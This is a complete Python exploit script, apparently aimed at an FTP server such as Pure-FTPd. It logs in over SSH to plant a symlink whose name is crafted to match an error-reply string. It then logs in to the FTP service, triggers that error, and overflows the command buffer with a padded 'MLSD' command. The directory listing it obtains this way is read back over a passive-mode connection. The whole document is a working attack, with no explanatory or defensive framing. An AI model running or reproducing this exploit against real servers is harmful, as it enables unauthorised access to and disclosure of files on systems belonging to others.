from pwn import remote import paramiko import sys import re if len(sys.argv) != 6: print("Usage: python3 pure.py

") sys.exit(1) ip = sys.argv[1] port = sys.argv[2] username = sys.argv[3] password = sys.argv[4] attack_dir = sys.argv[5] # connect to ssh and create sym link client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: # Connect to the SSH server client.connect(ip, 22, username, password) command = f""" cd /home ln -snf {attack_dir} $'e can\\'t do that in the current session\\r\\nogin\\r\\n' """ # Execute the command stdin, stdout, stderr = client.exec_command(command) except Exception as e: print(f"An error occurred: {e}") finally: # Close the SSH connection client.close() # Connect to ftp server & do exploit session=remote(ip, port) # authentication session.sendline(b"USER " + username.encode()) session.sendline(b"PASS " + password.encode()) #Send the extended passive mode , and capture the port number session.sendline(b"EPSV") response = session.recvuntil(b")").decode() match = re.search(r'\|\|\|(\d+)\|', response) if match: epsv_port = int(match.group(1)) print(f"Extracted EPSV port: {epsv_port}") else: print("No EPSV port found in the response.") session.close() sys.exit(1) # Intentionally trigger an error message for a constant string in the reply buffer session.sendline(b"PASS") # Should reply: 530 We can't do that in the current session print(session.recvline().decode()) # Overflow the cmd buffer payload=b"MLSD -".ljust(4101,b'.') session.sendline(payload) print(session.recvline().decode()) # Connect to pasv port for MLSD response pasv=remote(ip,epsv_port) # Read and print all lines from the passive connection until no more data try: while True: try: line = pasv.recvline(timeout=1) if not line: print("END") break print(line.decode().strip()) except: break finally: pasv.close() session.close()